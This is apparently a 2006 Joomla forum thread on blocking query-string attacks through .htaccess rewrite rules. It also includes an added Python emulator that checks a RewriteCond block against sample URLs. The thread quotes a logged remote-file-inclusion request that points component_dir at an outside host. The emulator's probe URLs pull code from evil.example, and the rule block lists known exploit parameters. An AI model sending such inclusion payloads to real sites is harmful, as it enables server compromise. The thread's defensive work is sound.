Also, for a query string attack like that, does the GET have to be case sensitive, plus in the existing recommended .htaccess rewrite rules are the query terms being evaluated as case sensitive?

_________________
-Tyler D.
Web Developer & Integrator: http://www.LasVegasExtremes.com



Posted: Mon Aug 14, 2006 7:23 am 
Joomla! Ace

Joined: Mon Dec 05, 2005 10:17 am
Posts: 1318
Location: New Orleans, LA, USA
tyler wrote:
I saw a hack done where there seemed to be a GET request in the query string:

Here is the error log message;
Quote:
62.149.0.117 - - [14/Aug/2006:00:48:38 +0700] "GET /myweb/administrator/components/com_webring/admin.webring.docs.php?component_dir=http://t3ch.addyour.net/ox.dat? HTTP/1.1" 404 266 "-" "libwww-perl/5.63"


I'm curious if this error log indicator above is a query string type of attack and I'm more interested if anyone can provide a suggested line for me to add to my existing version of the Joomla .htaccess (which also happens to be exactly the same as the recommended secured version that this thread discusses).

Would this be a good line for me to add in order to strengthen my security against that type of attack?:
Quote:
RewriteCond %{QUERY_STRING} GET and components or modules or mambots or templates [OR]


I realize the statement itself is probably wrong, but how should the .htaccess code look so that I rewrite any GET string that has any of those other terms with it (components or modules or mambots or templates)? 

This might not be candidate for the joomla recommended .htaccess cuz some people may have valid uses for such a query string, but I know that none of the URLs on my site will ever have GET in a query string with those other terms.

Also, for a query string attack like that, does the GET have to be case sensitive, plus in the existing recommended .htaccess rewrite rules are the query terms being evaluated as case sensitive?


Well, to be blunt, you are way off. 

First of all, GET is part of the HTTP request header and would be addressed with mod_rewrite by the {REQUEST_URI} field, not the {QUERY_STRING} field.  The query string is the part after the question mark '?'.  In your example it would be "component_dir=http://t3ch.addyour.net/ox.dat."

Furthermore, you cannot block access to components, templates, modules, or mambots completely without breaking a lot of functionality of your site.  For example, you won't be able to load any images that are part of your template, you won't be able to do anything that requires javascript (which is anything related to adding or editing content).  You won't be able to use any component or module that has its own javascript or stylesheet files.  I have tested this idea before, it doesn't work like you think it will.

What you want is something like this:

Code:
# Block out any script trying to set component_dir value through the URL
RewriteCond %{QUERY_STRING} component_dir(=|\%3D) [NC,OR]


Which if you are using the other mod_rewrite rules that I provided should go right above the last RewriteCond ... statement and its related comment to look something like this:

Code:
...
RewriteCond %{QUERY_STRING} GLOBALS(=|\[|\%[0-9A-Z]{0,2}) [OR]
# Block out any script trying to set component_dir value through the URL
RewriteCond %{QUERY_STRING} component_dir(=|\%3D) [NC,OR]
# Block out any script trying to modify a _REQUEST variable via URL
RewriteCond %{QUERY_STRING} _REQUEST(=|\[|\%[0-9A-Z]{0,2})
...


Lastly, this is not a real solution to preventing com_webring from getting hacked.  It will only block that specific attack and, considering com_webring has been abandoned for a long time, you should definitely remove it and find something else to replace it, as the chances of a proper patch and security audit being done on the component are almost nonexistent.

Hope that helps.

_________________
Rob Schley - Open Source Matters
Webimagery - http://www.webimagery.net/ - Professional Consulting Services
JXtended - http://www.jxtended.com/ - Free and Commercial Joomla! Extensions


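Two things in this thread are easy to get wrong silently in a block like the one above: how [OR] groups the RewriteCond lines (Chr's first version had the [OR] on the last condition instead of the one before it, which changes how the lines group) and whether a pattern is case-sensitive (tyler's question; a condition matches case-sensitively unless it carries [NC], so the mosConfig_ line as written does not catch MOSCONFIG_). The added example below, which is not code from the thread or from Apache, emulates mod_rewrite's evaluation of a RewriteCond chain against a query string so a block can be checked against sample URLs before it goes live. It handles only the flags this thread uses ([OR], [NC], [F], [L]), refuses a chain whose last condition still carries [OR] rather than guess what the server will do with it, and uses Python's re module in place of Apache's PCRE, which is close enough for these patterns but no substitute for a curl against the real server. The probe URLs are constructed.

```python
# Added example, not code from the thread: a small emulator of how mod_rewrite
# chains RewriteCond lines, used to check this thread's QUERY_STRING block
# against sample requests before touching a live .htaccess. Only the flags
# the thread uses ([OR], [NC], [F], [L]) are handled; Python's `re` stands in
# for Apache's PCRE.
import re
from urllib.parse import urlsplit

COND_RE = re.compile(r'^RewriteCond\s+%\{QUERY_STRING\}\s+(\S+)(?:\s+\[([A-Z,]+)\])?$')
RULE_RE = re.compile(r'^RewriteRule\s+\S+\s+\S+(?:\s+\[([A-Z,]+)\])?$')


def parse_block(text):
    """Return (conds, rule_flags): conds is [(compiled regex, or_next), ...].

    Refuses a block whose last RewriteCond carries [OR]: that is the mistake
    in Chr's first version, and what the server makes of it is not something
    to guess at.
    """
    conds, rule_flags = [], set()
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        m = COND_RE.match(line)
        if m:
            flags = set(filter(None, (m.group(2) or "").split(",")))
            rx = re.compile(m.group(1), re.IGNORECASE if "NC" in flags else 0)
            conds.append((rx, "OR" in flags))
            continue
        m = RULE_RE.match(line)
        if m:
            rule_flags = set(filter(None, (m.group(1) or "").split(",")))
            break                      # the rule closes the condition chain
        raise ValueError("unsupported line: %s" % line)
    if conds and conds[-1][1]:
        raise ValueError("last RewriteCond carries [OR] but nothing follows it")
    return conds, rule_flags


def conditions_match(conds, query):
    """mod_rewrite grouping: consecutive [OR] lines plus the first line without
    [OR] form one group; a group matches if any member does; groups are ANDed."""
    group_hit = False
    for rx, or_next in conds:
        group_hit = group_hit or bool(rx.search(query))
        if or_next:
            continue                   # group continues on the next line
        if not group_hit:
            return False               # an AND group failed: no rewrite
        group_hit = False              # next group starts fresh
    return True


def would_forbid(block_text, url):
    """True when the block would answer `url` with 403 (rule has the [F] flag)."""
    conds, rule_flags = parse_block(block_text)
    return "F" in rule_flags and conditions_match(conds, urlsplit(url).query)


def lint(block_text):
    """Error message for a malformed chain, or None when it parses cleanly."""
    try:
        parse_block(block_text)
        return None
    except ValueError as e:
        return str(e)


# The thread's corrected block, with RobS's component_dir line inserted where
# he said to put it (above the _REQUEST condition).
BLOCK = r"""
RewriteCond %{QUERY_STRING} mosConfig_[a-zA-Z_]{1,21}(=|\%3D) [OR]
RewriteCond %{QUERY_STRING} base64_encode.*\(.*\) [OR]
RewriteCond %{QUERY_STRING} (\<|%3C).*script.*(\>|%3E) [NC,OR]
RewriteCond %{QUERY_STRING} GLOBALS(=|\[|\%[0-9A-Z]{0,2}) [OR]
RewriteCond %{QUERY_STRING} component_dir(=|\%3D) [NC,OR]
RewriteCond %{QUERY_STRING} _REQUEST(=|\[|\%[0-9A-Z]{0,2}) [OR]
RewriteCond %{QUERY_STRING} sbp(=|\%20|\%3D) [OR]
RewriteCond %{QUERY_STRING} sb_authorname(=|\%20|\%3D) [OR]
RewriteCond %{QUERY_STRING} phpbb_root_path(=|\%3D|%[0-9A-Z]{0,2})
RewriteRule ^(.*)$ index.php [F,L]
"""

# Chr's first attempt: [OR] missing on sb_authorname and left on the last line.
BROKEN_BLOCK = r"""
RewriteCond %{QUERY_STRING} sbp(=|\%20|\%3D) [OR]
RewriteCond %{QUERY_STRING} sb_authorname(=|\%20|\%3D)
RewriteCond %{QUERY_STRING} phpbb_root_path(=|\%3D|%[0-9A-Z]{0,2}) [OR]
RewriteRule ^(.*)$ index.php [F,L]
"""

if __name__ == "__main__":
    # Constructed probes: one legitimate request and two exploit shapes from the thread.
    for url in ("/index.php?option=com_content&task=view&id=5",
                "/components/com_forum/download.php?phpbb_root_path=http://evil.example/c.txt?",
                "/index.php?MOSCONFIG_absolute_path=http://evil.example/c.txt?"):
        print("403" if would_forbid(BLOCK, url) else "pass", url)
```

Because every condition in the corrected block except the last carries [OR], the whole block is a single group and any one match forbids the request; the emulator's AND handling only comes into play when a line without [OR] is followed by more conditions, which is exactly the shape Chr's first version had by accident.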
Posted: Mon Aug 14, 2006 7:49 am 
Joomla! Intern

Joined: Thu Jan 26, 2006 11:36 pm
Posts: 71
Location: Los Angeles, California, United States
thx Rob, I don't have com_webring thankfully, but the explanation about the GET header and the clarification about the query string made me realize that I don't need to implement an .htaccess rule for just that one single exploit.

For some silly reason, I mis-interpreted that the GET command might be thrown in thru the querystring (which is not the case), so I'm not so worried about those type of exploits.

Would've only wanted to block components & modules verbiage in the query string line ONLY if it was vulnerable to hack in combination with a GET threat that occurred thru the query string (which as you explained does not happen that way).

thanks for the thorough explanations :)

_________________
-Tyler D.
Web Developer & Integrator: http://www.LasVegasExtremes.com



Posted: Mon Aug 14, 2006 7:52 am 
Joomla! Ace

Joined: Mon Dec 05, 2005 10:17 am
Posts: 1318
Location: New Orleans, LA, USA
You're welcome :)  As always, I am glad I could help people lock down their sites (or provide them with more knowledge how to) but I want to make sure they are following best practices in doing so...

_________________
Rob Schley - Open Source Matters
Webimagery - http://www.webimagery.net/ - Professional Consulting Services
JXtended - http://www.jxtended.com/ - Free and Commercial Joomla! Extensions


Powered by phpBB © 2000, 2002, 2005, 2007 phpBB Group